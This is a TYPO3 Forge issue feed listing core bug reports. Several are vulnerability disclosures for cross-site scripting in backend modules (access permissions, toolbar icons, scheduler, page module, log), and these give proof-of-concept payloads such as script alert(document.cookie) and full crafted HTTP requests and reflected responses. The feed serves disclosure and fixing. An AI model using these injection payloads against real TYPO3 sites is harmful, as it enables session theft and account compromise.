TYPO3 Forge: Issues
http://forge.typo3.org/
2021-01-21T09:33:22Z
TYPO3 Forge
Redmine

TYPO3 Core - Bug #93335 (Closed): XSS in access permission module
http://forge.typo3.org/issues/93335
2021-01-21T09:33:22Z
Oliver Hader (oliver.hader@typo3.org)
<a name="Steps"></a>
<h2 >Steps<a href="#Steps" class="wiki-anchor">¶</a></h2>
<ul>
<li>having <code>be_groups.title</code> containing XSS</li>
</ul>
<pre>Group<img src="x" onerror="alert(1)"></pre>
<ul>
<li>open <code>System > Access</code> module for a particular page</li>
<li>click on groupname element</li>
<li>change to group containing XSS in title (prerequisite) & save</li>
<li>click on groupname element again</li>
<li>change to different group</li>
<li>click on "x" icon in order to revert change</li>
</ul>
<p>XSS is executed</p>
<a name="Reasons"></a>
<h2 >Reasons<a href="#Reasons" class="wiki-anchor">¶</a></h2>
<ul>
<li><a class="external" href="https://github.com/TYPO3/TYPO3.CMS/blob/master/Build/Sources/TypeScript/beuser/Resources/Public/TypeScript/Permissions.ts#L84">https://github.com/TYPO3/TYPO3.CMS/blob/master/Build/Sources/TypeScript/beuser/Resources/Public/TypeScript/Permissions.ts#L84</a></li>
</ul>
<pre>buttonSelector.innerHTML = groupnameHtml;</pre>

TYPO3 Core - Bug #91334 (Closed): XSS in jQuery <3.5.0
http://forge.typo3.org/issues/91334
2020-05-07T14:20:43Z
Oliver Hader (oliver.hader@typo3.org)
<p><a class="external" href="https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/">https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/</a></p>

TYPO3 Core - Bug #84591 (Closed): XSS in ToolbarItems icon rendering
http://forge.typo3.org/issues/84591
2018-04-04T08:24:34Z
Oliver Hader (oliver.hader@typo3.org)
<blockquote>
<p>Today I built a CacheManipulateClass for a customer to flush a few news caches. (Please do not judge this way of flushing the cache. I know about clearCacheCmd.)</p>
<p>Context: Regular BE login and a sitepackage extension which registers this class.</p>
<p>Proof of Concept: My class adds this identifier</p>
</blockquote>
<pre>
/**
 * @param array $cacheActions
 * @param array $optionValues
 *
 * @return void
 */
public function manipulateCacheActions(&$cacheActions, &$optionValues)
{
    $iconFactory = GeneralUtility::makeInstance(IconFactory::class);
    $cacheActions[] = [
        'id' => 'news_clear_cache',
        'title' => 'Flush news caches',
        'description' => 'Clear fluid cache for frontend pages with news',
        'href' => (new UriBuilder())->buildUriFromRoute('news_clear_cache'),
        // Proof of concept: markup placed in 'icon' is rendered unescaped
        'icon' => '<script>alert(document.cookie);</script>'
    ];
}
</pre>
<blockquote>
<p>In TYPO3 7.6.x the cache manipulator has the option "icon", which is handled in TYPO3/v7/typo3/sysext/backend/Classes/Backend/ToolbarItems/ClearCacheToolbarItem.php<br />In the function getDropdown (line 160), the function uses $cacheAction['icon'] without htmlspecialchars().</p>
</blockquote>

TYPO3 Core - Bug #82079 (Closed): XSS in scheduler
http://forge.typo3.org/issues/82079
2017-08-10T15:39:53Z
Oliver Hader (oliver.hader@typo3.org)
<p>I would like to inform you about a security issue that I have found in the SCHEDULER plugin of the CMS TYPO3 (checked on version 8.7.3); specifically, it is accessible in the "Scheduler" section of the Backend administrative console.</p>
<p>The Scheduler plugin of TYPO3 was found to be vulnerable to Reflected Cross-Site Scripting, for the requests to Add or Edit a task, specifically on the 2 parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D".</p>
<p>Technical Details
=================<br />The scenario to reproduce the security issue is described below.</p>
<p>Proof of Concept:<br />To replicate the issue, an authenticated user (with permission to create/edit tasks) has to click the button "Add-Task" or "Edit-Task" in the Scheduler area.<br />It is then sufficient to grab the request which is being passed to the server and add the payloads in the 2 vulnerable parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D", so the submitted payloads are replicated in the response.</p>
<p>EXAMPLE<br />Payloads: <br />krup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1<br />de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag</p>
<p>ORIGINAL REQUEST:<br />----------------------------------<br />POST /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add HTTP/1.1<br />Host: X.X.X.X<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 479<br />Referer: <a class="external" href="http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add">http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add</a><br />Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1</p>
<p>tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=1500887453&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save</p>
<p>PoC REQUEST:<br />-----------------------<br />GET /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add&tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=15008874533rup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save HTTP/1.1<br />Host: X.X.X.X<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Referer: <a class="external" href="http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add">http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add</a><br />Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1</p>
<p>PoC RESPONSE:<br />--------------------------<br />HTTP/1.1 200 OK<br />Date: Mon, 24 Jul 2017 09:35:42 GMT<br />Server: Apache/2.4.18 (Ubuntu)<br />Expires: 0<br />Last-Modified: Mon, 24 Jul 2017 09:35:42 GMT<br />Cache-Control: no-cache, must-revalidate<br />Pragma: no-cache<br />X-Frame-Options: SAMEORIGIN<br />Vary: Accept-Encoding<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 51666</p>
<p><!DOCTYPE html><br /><html><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br />[...]<br /><label>Task group</label></abbr></span><div class="form-control-wrap"><select name="tx_scheduler[task_group]" id="task_class" class="form-control"><option value="0" title=""></option></select></div></div></div><br /><div class="form-section"><div class="row"><div class="form-group col-sm-6" id="task_start_col"><label><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_start"><abbr class="t3-help-teaser">Start (HH:MM DD-MM-YYYY)</abbr></span></label><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_start_row-wrapper"><input name="tx_scheduler[start]_hr" value="20:48 11-08-2445" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_start_row"><input name="tx_scheduler[start]" value="15008874533rup3z"><script>alert(1)</script>yflbjwmu6m1" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_start_row"><span class="fa fa-calendar"></span></label></span></div></div></div><br /><div class="form-group col-sm-6" id="task_end_col"><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_end"><abbr class="t3-help-teaser"><label>End (HH:MM DD-MM-YYYY)</label></abbr></span><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_end_row-wrapper"><input name="tx_scheduler[end]_hr" value="" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_end_row"><input name="tx_scheduler[end]" value="de6gi"><script>alert(2)</script>h3wq9ysmjag" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_end_row"><span class="fa 
fa-calendar"></span></label></span></div></div></div></div></div><br />[...]</p>
<p>Attached a screenshot of the PoC to better illustrate the vulnerability.</p>
<p>Vulnerable Versions:<br />TYPO3 8.7.3 and earlier</p>
<p>Checked on TYPO3/8.7.3</p>
<p>I have not received your response to my 2 previous reports (I hope to receive at least a response from you). Anyway, I am always available if you need further explanations. Kind regards.</p>

TYPO3 Core - Bug #82077 (Closed): XSS in page module
http://forge.typo3.org/issues/82077
2017-08-10T15:35:29Z
Oliver Hader (oliver.hader@typo3.org)
<p>For the attention of the TYPO3 security team,</p>
<p>I would like to inform you about a security issue that I have found in the CMS TYPO3 (checked on versions 8.7.3 and 6.2.30).</p>
<p>Specifically, these versions of TYPO3 are vulnerable to a Reflected Cross-Site Scripting in the "Edit Page" area of the Backend administrative console, for pages which are configured to show the content from other pages.</p>
<p>Technical Details
=================<br />The scenario to reproduce the security issue is described below.</p>
<p>Prerequisite - Configure a page to show content from another page: in the home of the Backend administrative console, select "Page" from the left panel, then select a site page in the tree view on the side and go to "Edit Page". Then select the "Appearance" tab and click the "Page" button in the "Replace Content" section in order to add any content to that page, and finally save it.</p>
<p>At this point, in the "Edit Page" area for the aforementioned page, a blue rectangle appears containing a link with the label "Page uses content from ...", and this link is affected by the reflected XSS issue.</p>
<p>Proof of Concept:<br />To replicate the issue it is sufficient to click the aforementioned new link (for 8.7.3 it has the format: "/typo3/index.php?M=web_layout&moduleToken=<TOKEN-VALUE>&id=<ID-VALUE>").</p>
<p>Then grab the GET request which is being passed to the server and add the payload in the URL query, so that the submitted payload is reflected in the corresponding response body.</p>
<p>EXAMPLE (attached there is a screenshot of the PoC)<br />Payload: &xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E</p>
<p>ORIGINAL REQUEST:<br />--------------------------------<br />GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2 HTTP/1.1<br />Host: X.X.X.X<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />If-Modified-Since: Wed, 12 Jul 2017 07:20:31 GMT</p>
<p>PoC REQUEST:<br />------------<br />GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2&xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1<br />Host: X.X.X.X<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1</p>
<p>PoC RESPONSE:<br />-------------<br />HTTP/1.1 200 OK<br />Date: Wed, 12 Jul 2017 08:15:06 GMT<br />Server: Apache/2.4.18 (Ubuntu)<br />Expires: 0<br />Last-Modified: Wed, 12 Jul 2017 08:15:06 GMT<br />Cache-Control: no-cache, must-revalidate<br />Pragma: no-cache<br />X-Frame-Options: SAMEORIGIN<br />Vary: Accept-Encoding<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 41399</p>
<p><!DOCTYPE html><br /><html><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br />[...]<br /><div class="callout callout-info"><div class="media"><div class="media-left"><span class="fa-stack fa-lg callout-icon"><i class="fa fa-circle fa-stack-2x"></i><i class="fa fa-info fa-stack-1x"></i></span></div><div class="media-body"><h4 class="callout-title">page1</h4><div class="callout-body"><br /> Page uses content from this page: <a href="/typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=1&xss"><script>alert('xss')</script>=">page1 (PID 1)</a><br /></div></div></div></div><br />[...]</p>
<p>Vulnerable Versions:<br />TYPO3 8.7.3 and earlier</p>
<p>Checked on:<br />TYPO3/8.7.3 <br />TYPO3/6.2.30 (for the 6.2.x versions the affected link is "/typo3/sysext/cms/layout/db_layout.php?id=1&clear_cache=1")</p>

TYPO3 Core - Bug #78743 (Rejected): Wrong translation behavior for pages/pages_language_overlay
http://forge.typo3.org/issues/78743
2016-11-18T13:30:30Z
Oliver Hader (oliver.hader@typo3.org)
<ol>
<li>on localizing a page, references of <code>pages.media</code> are not copied to <code>pages_language_overlay.media</code> in DataHandler if <code>localizeChildrenAtParentLocalization</code> is defined in TCA</li>
<li>RootlineUtility is not capable of resolving overlays correctly, ignores <code>l10n_mode</code> and uses custom reference queries -> RelationHandler could be used here</li>
</ol>

TYPO3 Core - Bug #73502 (Closed): Workspace Module continiously reloading
http://forge.typo3.org/issues/73502
2016-02-16T18:50:43Z
Oliver Hader (oliver.hader@typo3.org)
<p>Since <a class="changeset" title="[TASK] Use getAbsoluteWebPath instead of extRelPath In order to be more flexible for path resolv..." href="http://forge.typo3.org/projects/typo3cms-core/repository/1749/revisions/2f0a9521b343f757b543a9f8f2ac1ba9d06a69e2">2f0a9521b343f757b543a9f8f2ac1ba9d06a69e2</a> the workspace module is continuously reloading.</p>

TYPO3 Core - Bug #72475 (Closed): XSS in belog module
http://forge.typo3.org/issues/72475
2015-12-30T13:23:09Z
Oliver Hader (oliver.hader@typo3.org)
<p>The belog module, accessible for admin users, is vulnerable to XSS.</p>
<p>Requirements</p>
<p>a) create a backend user having the name <pre>te<b>st</b></pre><br />b) create a workspace record having the title <pre>work<b>space</b></pre></p>
<p>PoC</p>
<ul>
<li>switch to the created user</li>
<li>switch to the created workspace</li>
<li>modify or create any content</li>
<li>open the log at System>Log and see the unescaped contents of the user and workspace</li>
</ul>

TYPO3 Core - Task #59116 (Accepted): Workspace module shows unmodified values
http://forge.typo3.org/issues/59116
2014-05-26T13:14:13Z
Oliver Hader (oliver.hader@typo3.org)
<p>The workspace module shows field values that have not been modified by a user. This can be reproduced by e.g. creating a new text with images element in a workspace, but without any image.</p>
This can be enhanced by using better defaults for records:
<ul>
<li>NULL vs. empty string for the "image" field for example</li>
<li>skipping empty and system values in the workspace module view</li>
</ul>

TYPO3 Core - Epic #58282 (Closed): Workspaces Workpackage #2
http://forge.typo3.org/issues/58282
2014-04-28T10:47:28Z
Oliver Hader (oliver.hader@typo3.org)

TYPO3 Core - Epic #54851 (Closed): WP: Workspaces IRRE & MM bugfixes
http://forge.typo3.org/issues/54851
2014-01-08T22:08:22Z
Oliver Hader (oliver.hader@typo3.org)
<p>The import and export functionality is available since the beginning of TYPO3 CMS. This backend module mostly relies on the internal DataHandler/TCEMain system of TYPO3. For TYPO3 6.2 LTS, the Core Team needs to improve the handling of the IRRE and MM relations within the import and export process.<br />Additionally, the import / export module must be able to handle exports which were generated in a pre-FAL-version of TYPO3 (e.g. like the last LTS Version 4.5) in order to be able to import directly to the FAL.<br />Since importing and exporting large sites via a web-backend leads to problems in runtime and memory limits, a CLI Module must be added.</p>
<p>Recent development can be found here:<br /><a class="external" href="https://github.com/ohader/TYPO3.CMS/commits/integration">https://github.com/ohader/TYPO3.CMS/commits/integration</a> (integration branch)<br /><a class="external" href="https://github.com/ohader/TYPO3.CMS/commits/bugfixes">https://github.com/ohader/TYPO3.CMS/commits/bugfixes</a> (development branch)</p>

TYPO3 Core - Bug #50210 (Closed): Width of action column is wrong
http://forge.typo3.org/issues/50210
2013-07-20T09:09:23Z
Oliver Hader (oliver.hader@typo3.org)
<p>The width of the action column in the workspaces module is wrong.<br />5 icons with a width of 16px each need to be displayed (= 80px).</p>
<p>Before:<br /><img src="http://forge.typo3.org/attachments/download/24462/50210_before.png" alt="" loading="lazy" /></p>
<p>After:<br /><img src="http://forge.typo3.org/attachments/download/24463/50210_after.png" alt="" loading="lazy" /></p>

TYPO3 Core - Task #45676 (Rejected): Workspace references are not considered
http://forge.typo3.org/issues/45676
2013-02-20T21:32:35Z
Oliver Hader (oliver.hader@typo3.org)
<p>Workspace references for MM and IRRE records are not considered, since only the UID of the live record is considered (due to overlays).<br />While this might(!) work in most cases for existing records that get modified in a workspace, it does not for records that are newly created. In this case, the "live record" is a workspace placeholder without any data.</p>
<p>MM and IRRE always need to use the most specific UID in references, which is the versioned record in this case.</p>

TYPO3 Core - Bug #39155 (Closed): Warning on fetching undefined category definitions
http://forge.typo3.org/issues/39155
2012-07-21T13:29:23Z
Oliver Hader (oliver.hader@typo3.org)
<p>Calling t3lib_category_Registry::getDatabaseTableDefinition() for an extension that does not register any categories, will cause a PHP Warning.</p>
<p>PHP Warning: Invalid argument supplied for foreach() in t3lib/category/Registry.php line 150</p>

TYPO3 Core - Bug #36841 (Closed): Wrong query in RecordCollectionRepository
http://forge.typo3.org/issues/36841
2012-05-04T13:11:56Z
Oliver Hader (oliver.hader@typo3.org)
<p>If t3lib_collection_RecordCollectionRepository::queryMultipleRecords() is called without any argument the SQL statement is wrong since t3lib_BEfunc::deleteClause() starts with "AND".</p>